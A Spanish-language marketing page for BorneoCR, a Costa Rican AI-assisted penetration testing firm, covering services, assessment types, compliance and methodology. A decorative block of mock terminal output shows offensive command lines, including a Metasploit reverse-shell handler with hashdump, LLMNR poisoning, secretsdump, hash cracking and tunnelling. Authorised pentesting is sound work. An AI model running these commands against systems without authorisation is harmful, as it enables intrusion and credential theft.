¿Qué es un pentest y para qué sirve?

Un pentest (prueba de penetración) es una simulación controlada de un ataque cibernético realizado por expertos certificados para identificar vulnerabilidades en su infraestructura antes que los atacantes reales. Sirve para cumplir requisitos regulatorios, identificar brechas de seguridad, validar controles existentes y reducir el riesgo de incidentes costosos.

¿Con qué frecuencia debe realizarse un pentest?

La práctica recomendada es realizar un pentest al menos una vez al año. También se recomienda ejecutarlos después de cambios significativos en la infraestructura, lanzamiento de aplicaciones nuevas, antes de auditorías de cumplimiento (ISO 27001, PCI DSS) y después de incidentes de seguridad relevantes.

¿El pentesting afecta la operación de mi empresa durante las pruebas?

En la mayoría de los casos, no. BorneoCR realiza pruebas en horarios acordados y con metodologías calibradas para minimizar impacto operativo. Para entornos de producción sensibles, podemos trabajar en ambientes de staging o en horarios de bajo tráfico. Todo se planifica y aprueba previamente con su equipo.

¿Qué entregables recibo al finalizar el análisis de penetración?

Al finalizar el pentest recibirá: un informe ejecutivo para la junta directiva, un informe técnico detallado con evidencias para el equipo de TI, listado priorizado de vulnerabilidades con CVSS score, vectores de ataque documentados, recomendaciones específicas de remediación y una sesión de presentación de resultados.

$ nmap -sV -sC -O 10.0.0.0/24
Starting Nmap 7.94 ( https://nmap.org )
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9
80/tcp  open  http     nginx 1.24
443/tcp open  https    Apache 2.4.58
3306/tcp open mysql    MySQL 8.0.35
$ sqlmap -u "https://target/api?id=1" --dbs
[INFO] testing connection to the target URL
[INFO] testing SQL injection on GET parameter 'id'
[INFO] GET parameter 'id' is vulnerable
available databases [3]:
[*] information_schema
[*] production_db
[*] user_sessions
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.5
msf6 > exploit
[*] Started reverse TCP handler on 10.0.0.5:4444
[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer    : DC01
OS          : Windows Server 2022
Domain      : CORP.LOCAL
meterpreter > hashdump
Administrator:500:aad3b435:e02bc50...
$ borneo-scan --target https://target.com --severity critical,high
[critical] CVE-2024-21887 [http]
[high] CVE-2023-46805 [http]
[medium] CVE-2023-44487 [http]
$ python3 bloodhound.py -d corp.local
[*] Collecting domain info
[*] Found 847 users
[*] Found 12 domain admins
[*] Shortest path to DA: 3 hops
$ responder -I eth0 -wrf
[+] Listening for events...
[*] [LLMNR] Poisoned answer sent
[*] [NTLMv2] Hash captured: jdoe::CORP
$ kerbrute userenum users.txt -d corp.local
[+] [email protected] - VALID
[+] [email protected] - VALID
$ crackmapexec smb 10.0.0.0/24 --shares
SMB  10.0.0.10  445  DC01  [+] CORP\admin

$ burpsuite --project pentesting-2026
[*] Proxy listener started on 127.0.0.1:8080
[*] Scanning https://app.target.com
[CRITICAL] SQL Injection in /api/v2/users
[HIGH] Stored XSS in /dashboard/comments
[HIGH] IDOR in /api/orders/{id}
[MEDIUM] Missing CSRF token on /settings
$ gobuster dir -u https://target.com -w common.txt
/admin          (Status: 302) [Size: 0]
/api            (Status: 200) [Size: 4521]
/backup         (Status: 403) [Size: 0]
/.env           (Status: 200) [Size: 892]
/graphql        (Status: 200) [Size: 12]
$ ffuf -w params.txt -u https://target/FUZZ
[Status: 200] [Size: 1337] debug
[Status: 200] [Size: 4096] admin_panel
[Status: 302] [Size: 0]    internal_api
$ hashcat -m 1000 hashes.txt rockyou.txt
$   Session: hashcat
$   Status: Running
$   Hash.Type: NTLM
$   Speed: 48.2 GH/s
$   Recovered: 14/20 (70.00%)
$ impacket-secretsdump CORP/[email protected]
[*] Dumping LSA Secrets
[*] $MACHINE.ACC: aes256-cts
[*] DPAPI_SYSTEM: 01000000...
[*] NL$KM: 8a7b2c...
$ certipy find -u [email protected]
[*] Found 23 certificate templates
[!] ESC1: VulnTemplate - ENROLLEE_SUPPLIES_SUBJECT
[!] ESC4: WebServer - WRITE_DACL to low-priv
$ python3 coercer.py -t 10.0.0.10
[+] PetitPotam triggered successfully
[+] Authentication coerced from DC01$

$ subfinder -d target.com -silent
api.target.com
staging.target.com
dev.target.com
admin.target.com
vpn.target.com
$ amass enum -d target.com -passive
[*] OWASP Amass v4.2.0
[*] 47 names discovered
[*] 12 addresses found
$ nikto -h https://target.com
+ Server: nginx/1.24
+ /admin/: Admin login page found
+ /phpinfo.php: PHP info exposed
+ X-Frame-Options header missing
+ HTTP TRACE method enabled
$ wpscan --url https://target.com
[+] WordPress version 6.4.2
[!] 3 vulnerabilities identified
[i] Plugin: contact-form-7 v5.8
[!] CVE-2023-6449 (critical)
$ testssl.sh https://target.com
Testing protocols via sockets
 SSLv2     not offered (OK)
 SSLv3     not offered (OK)
 TLS 1     offered (NOT ok)
 TLS 1.1   offered (NOT ok)
 TLS 1.2   offered (OK)
 TLS 1.3   offered (OK)
 BEAST     VULNERABLE (TLS 1)
 POODLE    not vulnerable
$ shodan search "org:target"
Results found: 142
143.55.12.1  port:22  OpenSSH 7.6
143.55.12.5  port:443 nginx 1.18
143.55.12.8  port:8080 Apache Tomcat
143.55.12.20 port:3389 RDP
$ chisel server --reverse --port 8888
[*] Listening on 0.0.0.0:8888
[*] New connection from 10.0.0.50
[*] Tunnel established: R:1080
$ proxychains nmap -sT 172.16.0.0/24
[proxychains] Strict chain ...
172.16.0.1:22  open
172.16.0.5:445 open
172.16.0.10:80 open

Pentesting
Potenciado por IA

Combinamos inteligencia artificial con expertos certificados CEH Master, CPENT, ECSA, CEHPC y LCSPC para ampliar la superficie de ataque más allá de lo humanamente posible. Resultados de alto valor en tiempos récord: cobertura masiva, patrones ocultos y hallazgos que los escáneres tradicionales no detectan.

securitySolicitar Evaluación arrow_backVolver al Inicio

Inteligencia Artificial al Servicio de la
Seguridad Ofensiva

Nuestra plataforma de IA analiza, escanea y correlaciona en paralelo, ampliando exponencialmente lo que un equipo humano puede cubrir. El resultado: pentesting más profundo, más rápido y con hallazgos que los métodos tradicionales no alcanzan.

blur_on

Superficie de Ataque Ampliada

Nuestra IA escanea miles de endpoints, subdominios y configuraciones simultáneamente, cubriendo una superficie de ataque que tomaría semanas de forma manual.

speed

Velocidad Sin Precedentes

Lo que antes tomaba semanas ahora se completa en días. La IA ejecuta pruebas automatizadas 24/7 mientras nuestros expertos analizan los hallazgos de mayor impacto.

psychology

Detección de Patrones Ocultos

Los modelos de IA detectan correlaciones y patrones de vulnerabilidad que el ojo humano no percibe: cadenas de explotación complejas, configuraciones débiles interconectadas y rutas de ataque no obvias.

Pentesting Tradicional vs Pentesting con IA BorneoCR

remove_circle_outlinePentesting Tradicional

dns~500 endpoints evaluados

schedule3–4 semanas de ejecución

searchHallazgos conocidos y predecibles

personLimitado a la capacidad del equipo

auto_awesomePentesting con IA BorneoCR

dns10,000+ endpoints analizados

speed5–7 días con resultados profundos

psychologyHallazgos profundos + patrones ocultos

smart_toyIA + expertos certificados = cobertura total

Qué incluye el servicio

Cobertura completa de seguridad ofensiva potenciada por inteligencia artificial, adaptada a la realidad de tu organización.

bug_report

Pentesting Black / White / Grey Box

Modalidades adaptadas a su objetivo: Black box simula un atacante externo sin información previa, Grey box evalúa con acceso parcial (credenciales de usuario), White box revisa código fuente y arquitectura completa.

auto_awesomePotenciado por IA para cobertura masiva de endpoints

shield

Evaluación de Vulnerabilidades

Escaneo con herramientas especializadas combinadas con validación manual. Clasificación CVSS v3.1 y mapeo a MITRE ATT&CK para cada hallazgo.

auto_awesomeEscaneo automatizado con IA que prioriza por riesgo real al negocio

language

Seguridad Web (OWASP Top 10)

Testing con Burp Suite Pro y OWASP ZAP. Cobertura completa: SQLi, XSS, SSRF, IDOR, broken authentication, mass assignment, y las 10 vulnerabilidades más críticas según OWASP 2025.

auto_awesomeFuzzing inteligente con IA que descubre vulnerabilidades en lógica de negocio

api

Seguridad de APIs

Pruebas REST, GraphQL y gRPC. Validación de autenticación OAuth/JWT, BOLA/BFLA (OWASP API Top 10), rate limiting, y exposición de datos sensibles.

auto_awesomeAnálisis automatizado de esquemas y flujos de autenticación con ML

smartphone

Seguridad de Apps Móviles

Análisis estático (SAST) y dinámico (DAST) en Android e iOS siguiendo OWASP Mobile Top 10. Revisión de almacenamiento local, comunicaciones, certificate pinning y lógica de negocio.

auto_awesomeAnálisis estático potenciado por IA para detectar patrones inseguros en código

swords

Ingeniería Social y Red Team

Campañas de phishing con métricas de clic/reporte, vishing telefónico, pretexting presencial. Ejercicios Red Team completos con MITRE ATT&CK mapping y Purple Team colaborativo con su equipo de defensa.

auto_awesomeIA para reconocimiento automatizado y generación de vectores de ataque adaptativos

Tipos de Evaluación

Desde evaluaciones rápidas hasta operaciones Red Team de larga duración. Seleccione el nivel adecuado para su organización.

	searchVulnerability Assessment	bug_reportPenetration Test	swordsRed Team
Objetivo	Obtener un mapa completo de las vulnerabilidades conocidas en su infraestructura. Usted recibe una lista priorizada por criticidad real para que su equipo de TI sepa exactamente qué corregir primero y reduzca su superficie de ataque de forma medible.	Demostrar con evidencia tangible cómo un atacante real podría comprometer sus sistemas críticos. No solo le decimos qué es vulnerable: le mostramos la cadena de explotación completa, el impacto al negocio y las rutas de escalamiento que un adversario usaría.	Simular una operación adversarial completa —personas, procesos y tecnología— con un objetivo definido (ej. acceder a datos financieros, comprometer el directorio activo). Usted mide la capacidad real de detección y respuesta de su organización ante un atacante sofisticado.
Alcance	Toda su superficie expuesta: servidores, redes, aplicaciones web, APIs y servicios en la nube. La evaluación cubre tanto activos internos como externos para darle visibilidad total de su postura de seguridad.	Sistemas críticos definidos con usted: aplicaciones de negocio, bases de datos con información sensible, infraestructura de red interna y perimetral. Nos enfocamos donde el impacto al negocio es mayor.	Su organización completa como objetivo: infraestructura técnica, empleados (ingeniería social), controles físicos, procesos de respuesta a incidentes y capacidad del SOC. Un ejercicio integral que evalúa defensa en profundidad.
Sigilo	No se requiere sigilo. Las pruebas se coordinan con su equipo de TI para maximizar la cobertura. Esto garantiza que no haya interrupciones operativas y que su equipo entienda cada paso del proceso.	Sigilo parcial: se prueba si sus controles de seguridad detectan actividad de explotación. Esto revela brechas reales en su monitoreo —alertas que no se disparan, logs que no se revisan, controles que no funcionan como se esperaba.	Máximo sigilo con evasión activa de defensas: simulamos tácticas, técnicas y procedimientos (TTPs) de grupos APT reales. El valor está en medir si su equipo de seguridad, SOC y herramientas detectan y responden ante un adversario avanzado y persistente.
Entregable	Reporte de 30-50 páginas en PDF con lista priorizada de CVEs, clasificación CVSS v3.1, recomendaciones de remediación paso a paso y resumen ejecutivo para la gerencia. Incluye sesión de seguimiento a los 30 días para validar la remediación.	Dos reportes: ejecutivo (10-15 páginas con impacto al negocio, riesgo financiero estimado y recomendaciones estratégicas) y técnico (40-80 páginas con evidencia, pasos de reproducción y mapeo MITRE ATT&CK). Incluye retest gratuito a los 30 días.	Narrativa completa de la operación con kill chain documentada, timeline de ataque, TTPs empleados, análisis de brechas en detección/respuesta y plan de mejora por fases. Incluye debriefing presencial con su equipo de seguridad y seguimiento trimestral.
Ideal para	Organizaciones que necesitan una línea base de seguridad, están preparando una certificación (ISO 27001, PCI DSS) o quieren priorizar inversiones de seguridad con datos concretos. También para empresas que nunca han realizado pruebas de seguridad.	Empresas con activos críticos digitales (e-commerce, banca, salud, SaaS) que necesitan demostrar a reguladores, clientes o junta directiva que sus sistemas resisten ataques reales. Organizaciones que ya remediaron un Vulnerability Assessment previo.	Organizaciones maduras en seguridad que ya cuentan con SOC, SIEM y controles avanzados, y necesitan validar su capacidad de detección y respuesta ante amenazas persistentes avanzadas (APTs). Bancos, aseguradoras, gobierno e infraestructura crítica.

Pentesting para Cumplimiento Regulatorio

Muchas regulaciones exigen pruebas de penetración periódicas. Le ayudamos a cumplir cada requisito con evidencia auditable.

Requisito 11.3

PCI DSS

Pruebas de penetración anuales obligatorias para procesadores de pago. Cobertura de segmentación de red, aplicaciones de pago y controles de acceso al entorno de datos de tarjetahabiente.

Control A.12.6

ISO 27001

Gestión de vulnerabilidades técnicas como control obligatorio del SGSI. Evidencia documentada para auditorías de certificación y mantenimiento del sistema de gestión.

Ley 8968

LPDP Costa Rica

Validación de seguridad de datos personales almacenados y procesados. Pruebas específicas sobre bases de datos con información sensible y flujos de consentimiento.

Trust Services Criteria

SOC 2 Type II

Evidencia de pruebas de seguridad para los criterios de Trust Services. Reportes compatibles con los requerimientos de auditores SOC 2 sobre controles de seguridad.

Cómo trabajamos

Metodología estructurada basada en PTES y OWASP Testing Guide.

1. Reconocimiento

Recopilación de información pasiva y activa: dominios, subdominios, tecnologías, empleados y superficie de ataque expuesta.

2. Escaneo y Enumeración

Identificación de puertos, servicios, versiones y vulnerabilidades conocidas con herramientas automatizadas y validación manual.

3. Explotación

Aprovechamiento controlado de vulnerabilidades para demostrar impacto real. Escalamiento de privilegios y movimiento lateral.

4. Post-Explotación

Evaluación de persistencia, exfiltración de datos de prueba y análisis de alcance del compromiso dentro de la red.

5. Reporte Ejecutivo y Técnico

Entrega de reporte con hallazgos priorizados por riesgo, evidencia detallada y recomendaciones accionables de remediación.

Por qué BorneoCR

No somos solo un escáner automatizado ni solo consultores manuales. Somos IA + equipo ofensivo real.

auto_awesome

IA + Experiencia Humana

No somos solo un escáner automático ni solo consultores manuales. Nuestra IA amplía la cobertura exponencialmente —miles de endpoints, subdominios y configuraciones en paralelo— y nuestros expertos certificados validan, contextualizan y priorizan cada hallazgo. El resultado: más profundo, más rápido y más relevante para su negocio.

verified

Equipo con CEH Master, CPENT, ECSA, CEHPC y LCSPC

Profesionales activos en CTFs y bug bounties con experiencia en gobierno, banca y retail de Costa Rica y Centroamérica.

description

Reportes Ejecutivos y Técnicos

Reporte gerencial con impacto financiero estimado y riesgo al negocio. Reporte técnico con pasos de reproducción, evidencia y mapeo MITRE ATT&CK para cada hallazgo.

science

Metodología Probada

Seguimos PTES (Penetration Testing Execution Standard) y OWASP Testing Guide. Cada prueba es repetible, documentada y auditable.

PentestingPotenciado por IA

Inteligencia Artificial al Servicio de laSeguridad Ofensiva